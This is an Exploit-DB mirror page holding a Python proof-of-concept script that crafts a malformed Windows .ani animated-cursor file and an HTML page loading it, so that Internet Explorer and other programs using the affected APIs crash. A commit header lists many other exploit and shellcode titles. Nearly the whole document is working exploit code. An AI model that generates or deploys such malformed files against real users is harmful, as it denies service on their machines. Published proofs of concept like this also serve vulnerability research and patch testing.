bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/dos/33719.py
Offensive Security 880bbe402e DB: 2019-03-08 
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

179 lines
No EOL
5.5 KiB
Python
Executable file
Raw Blame History

source: https://www.securityfocus.com/bid/38579/info
Microsoft Windows is prone to a remote denial-of-service vulnerability when processing '.ani' files.
Successful exploits will cause the vulnerable applications that use the affected APIs to crash or become unresponsive, denying service to legitimate users.
def Save(name, content):
file = open(name, 'w');
try:
file.write(content);
finally:
file.close();
def DWord(*values):
return DWords(values);
def DWords(values):
chars = [];
for value in values:
for i in range(4):
byte = (value >> (i * 8)) & 0xFF;
chars.append(chr(byte));
return ''.join(chars);
def Word(*values):
return Words(values);
def Words(values):
chars = [];
for value in values:
for i in range(2):
byte = (value >> (i * 8)) & 0xFF;
chars.append(chr(byte));
return ''.join(chars);
def Byte(*values):
return Bytes(values);
def Bytes(values):
chars = [];
for value in values:
chars.append(chr(value));
return ''.join(chars);
def Chunk(type_id, data, fake_size = None):
if fake_size is not None:
return type_id + DWord(fake_size) + DataOf(data);
return type_id + DWord(SizeOf(data)) + DataOf(data);
def Pad2DWords(string):
pad = (4 - (len(string) % 4)) % 4;
return string + '\0' * pad;
def SizeOf(thing):
return len(DataOf(thing));
def DataOf(thing):
if type(thing) == str:
return thing;
elif type(thing) == list:
struct_str_list = [];
try:
for struct_member in thing:
struct_str_list.append(DataOf(struct_member));
except:
print 'Member of %s' % repr(thing);
raise;
return ''.join(struct_str_list);
else:
raise AssertionError('Struct contains data of unhandled type %s' % \
type(thing));
BITMAPINFOHEADER = [
#http://msdn.microsoft.com/en-us/library/aa930622.aspx
DWord(0), # biSize; (size of this structure) *SET LATER*
DWord(0), # biWidth;
DWord(0), # biHeight;
Word(0), # biPlanes;
Word(0), # biBitCount;
DWord(0), # biCompression;
DWord(0), # biSizeImage;
DWord(0), # biXPelsPerMeter;
DWord(0), # biYPelsPerMeter;
DWord(0x3F000000), # biClrUsed (size of color table) (< 0x3FFFFFF4 to prevent overflow).
DWord(0), # biClrImportant
];
# Set BITMAPINFOHEADER.biSize
BITMAPINFOHEADER[0] = DWord(SizeOf(BITMAPINFOHEADER));
RGBQUAD = DWords([
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
]);
ICONIMAGE = [
# http://msdn.microsoft.com/en-us/library/ms997538.aspx
BITMAPINFOHEADER, # icHeader; // DIB header
RGBQUAD, # icColors[1]; // Color table
# BYTE icXOR[1]; // DIB bits for XOR mask
# BYTE icAND[1]; // DIB bits for AND mask
];
ICONDIR = [
# http://msdn.microsoft.com/en-us/library/ms997538.aspx
Word(0), # idReserved
Word(1), # idType (1=.ICO, 2=.CUR)
Word(1), # idCount (number of images)
];
ICONDIRENTRY = [
# http://msdn.microsoft.com/en-us/library/ms997538.aspx
Byte(0x20), # bWidth
Byte(0x20), # bHeight
Byte(0x0), # bColorCount
Byte(0), # bReserved (must be 0)
Word(0), # wPlanes (color planes)
Word(0), # wBitCount (bits per pixel)
DWord(0), # dwBytesInRes (bitmap resource size)
DWord(0), # dwImageOffset (bitmap offset in this file) *SET LATER*
];
# Set ICONDIRENTRY.dwImageOffset:
ICONDIRENTRY[6] = DWord(SizeOf(ICONIMAGE));
ICONDIRENTRY[7] = DWord(SizeOf(ICONDIR) + SizeOf(ICONDIRENTRY));
icon_chunk = Chunk('icon', ICONDIR + ICONDIRENTRY + ICONIMAGE);
fram_data = 'fram' + icon_chunk;
list_fram_chunk = Chunk('LIST', fram_data, 0x231C);
anih_cFrames = 0x01;
anih_cSteps = 0x01;
anih_cx = 0;
anih_cy = 0;
anih_cBitCount = 0x00;
anih_cPlanes = 0x01;
anih_JifRate = 0x0C;
anih_flags = 0x01;
# The first DWORD is the length, which we don't know yet:
anih_struct = [
DWord(0), # length of structure, to be set later.
DWord(1), # cFrames
DWord(1), # cSteps
DWord(0), # cx (must be 0)
DWord(0), # cy (must be 0)
DWord(0), # cBitCount
DWord(1), # cPlanes
DWord(0xC), # JifRate
DWord(1), # flags (1 = AF_ICON
];
# Set the length of the structure:
anih_struct[0] = DWord(SizeOf(anih_struct));
anih_chunk = Chunk('anih', anih_struct);
inam_data = Pad2DWords('MSIE 8.0 .ANI vulnerability\0');
inam_chunk = Chunk('INAM', inam_data);
iart_data = Pad2DWords('SkyLined http://skypher.com\0');
iart_chunk = Chunk('IART', iart_data);
info_chunk = 'INFO' + inam_chunk + iart_chunk;
list_info_chunk = Chunk('LIST', info_chunk);
acon_chunk = 'ACON' + list_info_chunk + anih_chunk + list_fram_chunk;
riff_chunk = Chunk('RIFF', acon_chunk, 0x23A8);
html = '<HEAD><META http-equiv="refresh" content="0"/></HEAD>' + \
'<BODY style="cursor:url(repro.ani)"></BODY>';
Save('repro.ani', riff_chunk);
Save('repro.html', html);
Reference in a new issue View git blame Copy permalink